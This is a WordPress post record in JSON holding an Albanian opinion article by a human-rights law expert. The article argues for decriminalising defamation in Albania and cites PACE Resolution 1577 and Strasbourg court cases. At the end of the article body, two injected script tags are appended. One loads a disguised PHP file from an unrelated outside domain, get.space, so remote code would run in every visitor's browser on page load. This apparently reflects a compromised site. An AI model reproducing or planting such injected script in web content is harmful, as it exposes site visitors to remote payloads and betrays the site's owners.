{"id":723,"date":"2014-09-29T01:31:50","date_gmt":"2014-09-28T23:31:50","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=723"},"modified":"2014-10-08T01:20:42","modified_gmt":"2014-10-07T23:20:42","slug":"a-duhet-dekriminalizuar-shpifja","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=723","title":{"rendered":"A duhet dekriminalizuar shpifja?"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2014\/09\/editorial-cartoon-2012-MAY-10-THURSDAY-DECRIMINALIZING-LIBEL-final.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"size-medium wp-image-724 alignleft\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2014\/09\/editorial-cartoon-2012-MAY-10-THURSDAY-DECRIMINALIZING-LIBEL-final-300x222.jpg\" alt=\"editorial cartoon 2012 MAY 10 THURSDAY DECRIMINALIZING LIBEL final\" width=\"300\" height=\"222\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/09\/editorial-cartoon-2012-MAY-10-THURSDAY-DECRIMINALIZING-LIBEL-final-300x222.jpg 300w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/09\/editorial-cartoon-2012-MAY-10-THURSDAY-DECRIMINALIZING-LIBEL-final-1024x759.jpg 1024w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/09\/editorial-cartoon-2012-MAY-10-THURSDAY-DECRIMINALIZING-LIBEL-final-800x593.jpg 800w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/09\/editorial-cartoon-2012-MAY-10-THURSDAY-DECRIMINALIZING-LIBEL-final.jpg 1600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><em>Nga Theodoros Alexandridis &#8211; Ekspert per jurisprudencen e Gjykates Europiane per te Drejtat e Njeriut<\/em><\/p>\n<p>N\u00eb raportin e vitit 2002 mbi lirin\u00eb e medias n\u00eb Shqip\u00ebri, Human Rights Watch arriti n\u00eb p\u00ebrfundimin se d\u00ebnimet gjyq\u00ebsore p\u00ebr shpifje bien ndesh me aktet nd\u00ebrkomb\u00ebtare p\u00ebr t\u00eb drejtat e njeriut dhe p\u00ebrb\u00ebjn\u00eb nj\u00eb k\u00ebrc\u00ebnim n\u00eb rritje ndaj liris\u00eb s\u00eb medias dhe debatit publik n\u00eb Shqip\u00ebri. Padit\u00eb p\u00ebr shpifjen, n\u00eb gjykat\u00ebn penale dhe civile jan\u00eb b\u00ebr\u00eb nj\u00eb arm\u00eb e preferuar e politikan\u00ebve shqiptar\u00eb p\u00ebr t\u00eb parandaluar kritikat dhe raportimet e gazetar\u00ebve. Sot shum\u00eb profesionist\u00eb t\u00eb medias n\u00eb Shqip\u00ebri ngren\u00eb shqet\u00ebsimin se gj\u00ebrat nuk kan\u00eb ndryshuar.<\/p>\n<p><em>Perspektivat nd\u00ebrkomb\u00ebtare<\/em><\/p>\n<p>Rezoluta 1577 (2007) \u201cDrejt dekriminalizimit t\u00eb shpifjes\u201d, miratuar m\u00eb 4 tetor 2007 nga Asambleja Parlamentare e K\u00ebshillit t\u00eb Evrop\u00ebs (PACE), \u00ebsht\u00eb nj\u00eb nga instrumentet kryesore p\u00ebr vendosjen e standardeve n\u00eb fush\u00ebn e dekriminalizimit t\u00eb shpifjes. N\u00eb rezolut\u00ebn e tij, PACE i b\u00ebri thirrje shteteve an\u00ebtare t\u00eb garantonin mos keqp\u00ebrdorim e procedurave penale p\u00ebr shpifje dhe se duhet t\u00eb shfuqizonin \u00e7do dispozit\u00eb ligjore q\u00eb ofron nj\u00eb mbrojtje t\u00eb privilegjuar p\u00ebr figurat publike. N\u00eb t\u00eb nj\u00ebjt\u00ebn koh\u00eb, shteteve i \u00ebsht\u00eb k\u00ebrkuar q\u00eb t\u00eb parashikojn\u00eb n\u00eb legjislacioni mjete efektive p\u00ebr mbrojtjen e personave t\u00eb akuzuar p\u00ebr shpifjet, duke i mund\u00ebsuar v\u00ebrtetimin e fakteve n\u00eb p\u00ebrputhje me interesin publik. Gjithashtu shteteve i \u00ebsht\u00eb k\u00ebrkuar q\u00eb t\u00eb vendosin kufij t\u00eb arsyesh\u00ebm p\u00ebr d\u00ebmshp\u00ebrblimet, me q\u00ebllim q\u00eb t\u00eb mos rrezikohet pozita e medias. P\u00ebr m\u00eb tep\u00ebr, ligjet duhet t\u00eb japin garancit\u00eb e duhura p\u00ebr ankimimin ndaj atyre d\u00ebmshp\u00ebrblimeve, q\u00eb jan\u00eb n\u00eb shp\u00ebrpjes\u00ebtim me d\u00ebmin e v\u00ebrtet\u00eb moral t\u00eb p\u00ebsuar nga padit\u00ebsi.<\/p>\n<p>Rezoluta e PACE ka sh\u00ebrbyer si burim frym\u00ebzimi p\u00ebr Gjykat\u00ebn Evropiane p\u00ebr t\u00eb Drejtat e Njeriut (Gjykata e Strasburgut) gjat\u00eb shqyrtimit t\u00eb p\u00ebrputhshm\u00ebris\u00eb s\u00eb d\u00ebnimeve t\u00eb gazetar\u00ebve p\u00ebr shpifje, me nenin 10 t\u00eb Konvent\u00ebs q\u00eb mbron t\u00eb drejt\u00ebn e liris\u00eb s\u00eb shprehjes. Ekziston nj\u00eb trend i fuqish\u00ebm drejt dekriminalizimit t\u00eb plot\u00eb t\u00eb shpifjes. Sipas P\u00ebrfaq\u00ebsuesit t\u00eb OSBE-s\u00eb p\u00ebr Lirin\u00eb e Medias, 15 nga 57 shtetet pjes\u00ebmarr\u00ebse t\u00eb OSBE-s\u00eb kan\u00eb si q\u00ebllim dhe synim shfuqizimin e ligjeve penale p\u00ebr shpifjen nd\u00ebrsa n\u00eb shtetet e tjera, gjykatat vendase tashm\u00eb i kan\u00eb konstatuar si antikushtetues ligjet penale p\u00ebr shpifjen.<\/p>\n<p><em>Zhvillimet ligjore n\u00eb Shqip\u00ebri \u2013 sa m\u00eb shum\u00eb gj\u00ebrat ndryshojn\u00eb, aq m\u00eb shum\u00eb q\u00ebndrojm\u00eb n\u00eb t\u00eb nj\u00ebjtin vend?<\/em><\/p>\n<p>\u00cbsht\u00eb tep\u00ebr interesante t\u00eb theksohet se reformat e fundit t\u00eb vitit 2012 n\u00eb legjislacionin shqiptar p\u00ebr shpifjen n\u00eb aspektin penal dhe civil, ishin produkt i shtat\u00eb vjet lobimi nga Instituti Shqiptar i Medias dhe Shoq\u00ebris\u00eb s\u00eb Hapur p\u00ebr Nisma n\u00eb Drejt\u00ebsi. Pavar\u00ebsisht se n\u00eb parim k\u00ebto ndryshime ishin pozitive, ndryshimet e ligjit penal n\u00eb ve\u00e7anti nuk mund t\u00eb thuhet se ishin shembull modernizmi. K\u00ebshtu, ligjv\u00ebn\u00ebsi shqiptar vendosi t\u00eb mbaj\u00eb n\u00eb fuqi veprat penale t\u00eb fyerjes dhe hoqi vet\u00ebm d\u00ebnimin me burgim. Nga ana tjet\u00ebr, u vu re q\u00eb u rrit minimumi dhe maksimumi i d\u00ebnimit me gjob\u00eb, ku maksimumi \u00ebsht\u00eb 3 milion\u00eb lek\u00eb t\u00eb reja, dhe d\u00ebnimi regjistrohet n\u00eb d\u00ebshmin\u00eb e penalitetit t\u00eb t\u00eb d\u00ebnuarit.<\/p>\n<p>Edhe pse \u00ebsht\u00eb shum\u00eb her\u00ebt p\u00ebr t\u00eb arritur n\u00eb nj\u00eb konkluzion, q\u00eb k\u00ebto ndryshime dhe praktika gjyq\u00ebsore jan\u00eb apo jo n\u00eb p\u00ebrputhje me nenin 10 t\u00eb Konvent\u00ebs, nga vendimet e Gjykat\u00ebs Europiane n\u00eb dy raste, parashikohet se kjo do jet\u00eb tendenca.<\/p>\n<p>K\u00ebshtu n\u00eb rastin e \u201c<em>Kasabova kund\u00ebr Bullgaris\u00eb\u201d\u00a0<\/em>k\u00ebrkuesja ishte nj\u00eb gazetare e cila shkroi nj\u00eb artikull, ku pretendohej ndjekja e praktikave korruptive nga ana e ekspert\u00ebve p\u00ebr pranimin e f\u00ebmij\u00ebve n\u00eb shkollat profesionale publike. Kat\u00ebr ekspert\u00ebt e akuzuan gazetaren p\u00ebr shpifje. Gjykata penale vendase konstatoi se e akuzuara nuk kishte vepruar n\u00eb p\u00ebrputhje me detyrat e saj si gazetare dhe e shpall\u00ebn fajtore p\u00ebr shpifje ndaj kat\u00ebr ekspert\u00ebve. Ajo u d\u00ebnua me gjob\u00eb, pagimin e shpenzimeve gjyq\u00ebsore dhe t\u00eb d\u00ebmeve t\u00eb shkaktuara n\u00eb nj\u00eb shum\u00eb totale prej 3,797 euro. Gjykata vuri n\u00eb dukje se shuma e p\u00ebrgjithshme e d\u00ebmeve, gjobat dhe shpenzimet e tjera mbi gazetaren ishte e barabart\u00eb me gati shtat\u00ebdhjet\u00eb fishin e pag\u00ebs minimale mujore n\u00eb Bullgari dhe m\u00eb shum\u00eb se tridhjet\u00eb e pes\u00eb fishin e pag\u00ebs mujore t\u00eb vet\u00eb gazetares. N\u00eb fakt, Gjykata ishte e gatshme t\u00eb pranonte q\u00eb edhe vet\u00ebm kat\u00ebr gjobat q\u00eb duhet t\u00eb paguheshin ndaj shtetit, n\u00eb shum\u00ebn 1.425 euro, ishin t\u00eb tepruara. P\u00ebr m\u00eb tep\u00ebr, Gjykata kritikoi edhe faktin q\u00eb sipas ligjit bullgar, n\u00ebse gazetarja do d\u00ebnohet p\u00ebr her\u00eb t\u00eb dyt\u00eb p\u00ebr shpifje, do t\u00eb p\u00ebrballet me d\u00ebnime m\u00eb t\u00eb r\u00ebnda penale dhe se p\u00ebr k\u00ebt\u00eb arsye d\u00ebnimi i saj kishte nj\u00eb \u201cefekt recidivist\u201d.<\/p>\n<p>N\u00eb rastin e \u201c<em>Dlugolecki kund\u00ebr Polonis\u00eb\u201d<\/em>\u00a0nuk ishte d\u00ebmshp\u00ebrblimi i tep\u00ebrt, pasi ishte vet\u00ebm 120 euro, por qe d\u00ebnimi i gazetarit p\u00ebr fyerje, i cili do t\u00eb regjistrohej n\u00eb t\u00eb dh\u00ebnat e tij penale, q\u00eb \u00e7oi Gjykat\u00ebn t\u00eb evidentonte nj\u00eb shkelje t\u00eb nenit 10. Ky lloj d\u00ebnimi p\u00ebrb\u00ebnte nj\u00eb lloj censure, e cila ka t\u00eb ngjar\u00eb q\u00eb t\u00eb ket\u00eb nj\u00eb efekt frik\u00ebsues jo vet\u00ebm p\u00ebr gazetarin e d\u00ebnuar, por edhe p\u00ebr koleg\u00ebt e tjer\u00eb. \u00cbsht\u00eb interesante t\u00eb theksohet se n\u00eb t\u00eb nj\u00ebjt\u00ebn \u00e7\u00ebshtje, Gjykata Europiane i akordoi gazetarit 3.000 euro shp\u00ebrblim p\u00ebr d\u00ebmin moral p\u00ebr shkak t\u00eb shqet\u00ebsimit dhe frustrimit q\u00eb ai kishte p\u00ebrjetuar. N\u00eb nj\u00eb rast t\u00eb m\u00ebparsh\u00ebm, gazetarit iu akordua 5000 euro shp\u00ebrblim p\u00ebr d\u00ebmin moral vet\u00ebm p\u00ebr arsye se d\u00ebnimi i tij penal me gjob\u00eb ishte regjistruar n\u00eb d\u00ebshmin\u00eb e penalitetit.<\/p>\n<p>E th\u00ebn\u00eb thjesht, rastet e m\u00ebsip\u00ebrme sugjerojn\u00eb se, edhe n\u00eb qoft\u00eb se nj\u00eb gazetar shqiptar i paguar me pag\u00eb modeste, ndon\u00ebse mund t\u00eb d\u00ebnohet me nj\u00eb gjob\u00eb simbolike (q\u00eb gj\u00eb as kjo nuk po ndodh sepse d\u00ebnimet n\u00eb Shqip\u00ebri kan\u00eb qen\u00eb t\u00eb larta), vet\u00eb fakti i regjistrimit t\u00eb d\u00ebnimit n\u00eb d\u00ebshmin\u00eb e penalitetit, do t\u00eb jet\u00eb i mjaftuesh\u00ebm p\u00ebr t\u00eb shkelur nenin 10 t\u00eb Konvent\u00ebs Europiane p\u00ebr t\u00eb Drejtat e Njeriut. P\u00ebr k\u00ebt\u00eb arsye ligjv\u00ebn\u00ebsi duhet shum\u00eb shpejt t\u2019i rikthehet p\u00ebrs\u00ebri ndryshimeve legjislative, n\u00eb m\u00ebnyr\u00eb q\u00eb k\u00ebt\u00eb her\u00eb t\u00eb dekriminalizoj\u00eb shpifjen. Ndoshta mund t\u00eb na ngush\u00eblloj\u00eb fakti q\u00eb edhe homolog\u00ebt italian\u00eb duket se kan\u00eb b\u00ebr\u00eb gabime t\u00eb nj\u00ebjta. K\u00ebshtu n\u00eb nj\u00eb artikull t\u00eb p\u00ebrbashk\u00ebt t\u00eb botuar n\u00eb \u201cCorriere della Sera\u201d, m\u00eb 8 qershor 2014, Komisioneri i K\u00ebshillit t\u00eb Evrop\u00ebs p\u00ebr t\u00eb Drejtat e Njeriut, Raportuesi Special i Kombeve t\u00eb Bashkuara p\u00ebr Promovimin dhe Mbrojtjen e t\u00eb Drejt\u00ebs p\u00ebr Lirin\u00eb e Mendimit dhe t\u00eb Shprehjes dhe P\u00ebrfaq\u00ebsuesi i OSBE-s\u00eb p\u00ebr Lirin\u00eb e Medias, duke p\u00ebrsh\u00ebndetur heqjen e d\u00ebnimeve me burgim p\u00ebr shpifje, kritikuan gjithashtu projektligjin italian p\u00ebr shpifjen, p\u00ebr shkak t\u00eb rritjes s\u00eb gjobave monetare t\u00eb d\u00ebnimit. Duke e konsideruar k\u00ebt\u00eb nj\u00eb mund\u00ebsi t\u00eb madhe p\u00ebr Italin\u00eb p\u00ebr t\u00eb riparuar ndjesh\u00ebm kuadrin e vet anakronik ligjor p\u00ebr shpifje, ata i b\u00ebn thirrje Senatit italian p\u00ebr t\u00eb ndryshuar projektligjin dhe t\u00eb dekriminalizojn\u00eb plot\u00ebsisht shpifjen.<\/p>\n<p>Mesazhi i dh\u00ebn\u00eb ligjv\u00ebn\u00ebsit Italian, i cili kishte gabuar nj\u00eblloj si ligjv\u00ebn\u00ebsi shqiptar, ishte edhe p\u00ebr ata pak shtete q\u00eb mund t\u00eb ken\u00eb mbetur ende me ligje dhe mend\u00ebsi anakronike. N\u00ebse ligjv\u00ebn\u00ebsi shqiptar sot nuk ka problem me mend\u00ebsin\u00eb, at\u00ebher\u00eb nuk i mbetet shum\u00eb pun\u00eb p\u00ebr t\u00eb korrigjuar ligjet, dhe p\u00ebr t\u2019i dh\u00ebn\u00eb m\u00eb shum\u00eb liri shprehjes.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nga Theodoros Alexandridis &#8211; Ekspert per jurisprudencen e Gjykates Europiane per te Drejtat e Njeriut N\u00eb raportin e vitit 2002 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":724,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/723"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=723"}],"version-history":[{"count":4,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/723\/revisions"}],"predecessor-version":[{"id":788,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/723\/revisions\/788"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/724"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=723"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=723"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=723"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}